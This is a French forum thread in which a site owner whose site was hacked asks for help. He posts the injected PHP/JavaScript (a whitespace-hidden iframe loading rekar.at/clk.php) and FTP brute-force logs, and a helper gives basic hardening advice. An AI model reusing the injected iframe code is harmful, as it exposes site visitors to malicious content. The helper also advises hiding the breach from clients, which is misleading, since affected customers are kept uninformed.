Discussion :

[torrgovin]

Bonsoir tout le monde.

Je viens d'avoir une mauvaise surprise lorsqu'une personne de mon entourage me fit savoir que mon site ne fonctionnait pas correctement et quand j'ai fais un petit tour j'ai vite remarqué que rien ne fonctionnait comme d'habitude.

A ma grande stupeur, j'ai remarqué qu'un petit malin s'était amusé à mettre du code dans mes pages. Voici ce qu'il a rajouté sur les pages en PHP

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
#68c8c7#
                                                                                                                                                                                                                                                          echo "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                          (function () {    var id = '75';    var hpfu09 = document.createElement('iframe');    hpfu09.src = 'http://rekar.at/clk.php';    hpfu09.style.position = 'absolute';    hpfu09.style.border = '1';    hpfu09.style.height = '31px';    hpfu09.style.width = '42px';    hpfu09.style.left = '500px';    hpfu09.style.top = '100px';    if (!document.getElementById('hpfu')) {        document.write('<style>body{overflow-x:hidden;}</style>');        document.write('<div id=\'hpfu\' style=\"position:absolute; width:80%; height:100%;\" ></div>');        document.getElementById('hpfu').appendChild(hpfu09);    }})();</script>";

#/68c8c7#

et aussi dans les fichiers JS

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/*68c8c7*/
                                                                                                                                                                                                                                                          (function () {
    var id = '90';
    var ny09 = document.createElement('iframe');
    ny09.src = 'http://rekar.at/clk.php';
    ny09.style.position = 'absolute';
    ny09.style.border = '1';
    ny09.style.height = '31px';
    ny09.style.width = '42px';
    ny09.style.left = '500px';
    ny09.style.top = '100px';

    if (!document.getElementById('ny')) {
        document.write('<style>body{overflow-x:hidden;}</style>');
        document.write('<div id=\'ny\' style="position:absolute; width:80%; height:100%;" ></div>');
        document.getElementById('ny').appendChild(ny09);
    }
})();
/*/68c8c7*/

Le problème c'est qu'il en a foutu pleins partout et j'ai plus de 100 pages sur mon site. Alors je suis en train de tout inspecter un par un.

Mais j'ai plusieurs questions :

1 - Comment le gars a pu accéder à mes fichiers ?
2 - A quoi sert son code ?
3 - Comment éviter qu'il puisse recommencer ?

J'attends votre aide avec impatience car il y a des données sensibles qui circulent sur mon serveur.

Merci à vous

[torrgovin]

J'ai l'impression que je subit des tentatives de connexions.

Voici ce que j'ai trouvé dans mes logs

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Thu Feb  7 10:46:02 2013 [pid 30503] [oracle] FAIL LOGIN: Client "93.189.144.100"
Thu Feb  7 10:46:05 2013 [pid 30503] [informix] FAIL LOGIN: Client "93.189.144.100"
Thu Feb  7 10:46:07 2013 [pid 30549] CONNECT: Client "93.189.144.100"
Thu Feb  7 10:46:09 2013 [pid 30548] [postgres] FAIL LOGIN: Client "93.189.144.100"
Thu Feb  7 10:46:12 2013 [pid 30548] [root] FAIL LOGIN: Client "93.189.144.100"
Thu Feb  7 10:46:15 2013 [pid 30548] [temp] FAIL LOGIN: Client "93.189.144.100"
Thu Feb  7 10:46:16 2013 [pid 30551] CONNECT: Client "93.189.144.100"
Thu Feb  7 10:46:17 2013 [pid 30550] [test] FAIL LOGIN: Client "93.189.144.100"
Thu Feb  7 10:46:21 2013 [pid 30550] [info] FAIL LOGIN: Client "93.189.144.100"
Thu Feb  7 10:46:23 2013 [pid 30550] [testuser] FAIL LOGIN: Client "93.189.144.100"
Thu Feb  7 10:46:24 2013 [pid 30553] CONNECT: Client "93.189.144.100"
Thu Feb  7 10:46:27 2013 [pid 30552] [tester] FAIL LOGIN: Client "93.189.144.100"
Thu Feb  7 10:46:29 2013 [pid 30552] [ftpuser] FAIL LOGIN: Client "93.189.144.100"
Thu Feb  7 10:46:32 2013 [pid 30552] [tester] FAIL LOGIN: Client "93.189.144.100"
Thu Feb  7 10:46:33 2013 [pid 30555] CONNECT: Client "93.189.144.100"
Thu Feb  7 10:46:35 2013 [pid 30554] [samba] FAIL LOGIN: Client "93.189.144.100"
Thu Feb  7 10:46:39 2013 [pid 30554] [tmp] FAIL LOGIN: Client "93.189.144.100"
Thu Feb  7 10:46:41 2013 [pid 30554] [mysql] FAIL LOGIN: Client "93.189.144.100"
Thu Feb  7 10:46:42 2013 [pid 30557] CONNECT: Client "93.189.144.100"

Comment bannir cette IP ?

[XxArchangexX]

Bonjour,

Comment bannir cette IP ?

Dans le htaccess avec cette ligne "deny from adresseip"

1 - Comment le gars a pu accéder à mes fichiers ?

S'il a modifié les pages c'est qu'il a eu accès au FTP, mot de passe trop facile ou pirate motivé

2 - A quoi sert son code ?

C'est une petite fenetre qui pointe ici : http://rekar.at/clk.php, remarque : pour ma part je n'ai pas cliqué ne sachant pas ou elle mène et dans le contexte dont tu en parles .

3 - Comment éviter qu'il puisse recommencer ?

Changer le mot de passe du FTP, vérifier que les zones de saisie du site sont sécurisées. Et si tu es chez un hébergeur voir s'ils n'ont pas des outils pour t'aider.

[torrgovin]

Merci pour ta réponse Archange mais le htaccess ne vas pas bloquer les connexions en FTP ni SSH ?

Étant donné que le brut-force a été fait sur le FTP, j'ai plutôt bloqué toutes les IP qui tentent de se connecter sur le service FTP grâce aux hosts.deny et allow

Est-ce la bonne méthode ? Il y a t-il d'autres précautions ?

Le mot de passe en question avait un caractère spécial "?" Je sais que les dictionnaires contiennent des mots basiques mais pour trouver un ? c'est balaise quand même non ?

Je viens de remarquer quelque chose aussi. La dernière connexion SSH a été fait depuis le domaine einstein.etsu.edu qui est quand même un domaine appartement à un établissement officiel.

Puis-je porter plainte contre X sachant que c'était un serveur sur lequel les plannings de mes employés étaient stockés et on a perdu 1 journée de travail le temps de remettre tout en place et donc une perte financière pas importante certes, mais surtout un préjudice pour l'image de ma société car mes clients n'ont pas du tout aimés cette panne.

Merci

On pense un peu dans le droit je sais, mais j'aimerais savoir si quelqu'un à une idée la-dessus.

[XxArchangexX]

le htaccess ne vas pas bloquer les connexions en FTP ni SSH ?

J'ai pensé que les tentatives de connexion était sur le site.

Est-ce la bonne méthode ? Il y a t-il d'autres précautions ?

Je ne connais pas trop ce point mais si tu bloques l'ip et qu'il est motivé il peut changer d'ordi et recommencer.

Je sais que les dictionnaires contiennent des mots basiques mais pour trouver un ? c'est balaise quand même non ?

De nos jours les dictionnaires de force brut sont tellement fournis qu'il doit y avoir un nombre de combinaison impressionnante. Mais dans le domaine du piratage il y a plein d'autres moyens que la force brut. Sur ce point ça dépasse mes connaissances.

Puis-je porter plainte contre X

C'est utile si tu as une assurance ou si les clients demandent un dédommagement. S'ils ne font que grogner, les clients sont connus pour cela .

De plus même si la France est précurseur dans le domaine du droit informatique, elle n'a pas mis les moyens pour suivre. Il doit y a voir une centaine d'agents à la CNIL et pareil dans la gendarmerie contre la cybercriminalité. Donc ton cas ne sera pas prioritaire. Le nombre d'entreprise piratées sont nombreuses, mais il n'y a pas de chiffre officiel car elles n'en parlent pas pour l'image comme tu l'as signalé.

Pour ton cas, tu peux dire qu'il y a eu un léger problème technique, que tu as résolu rapidement. Sans dire aux clients la cause réel. Contrairement aux clients qui veulent du 100% de dispo de service, en informatique on sait bien que les petites coupures ça arrive. Il faut s’inquiéter quand se sont des données très sensible comme c'est arrivé sur les comptes PS3.

[torrgovin]

Ok merci pour ton aide ! Je suis preneur d'autres conseils.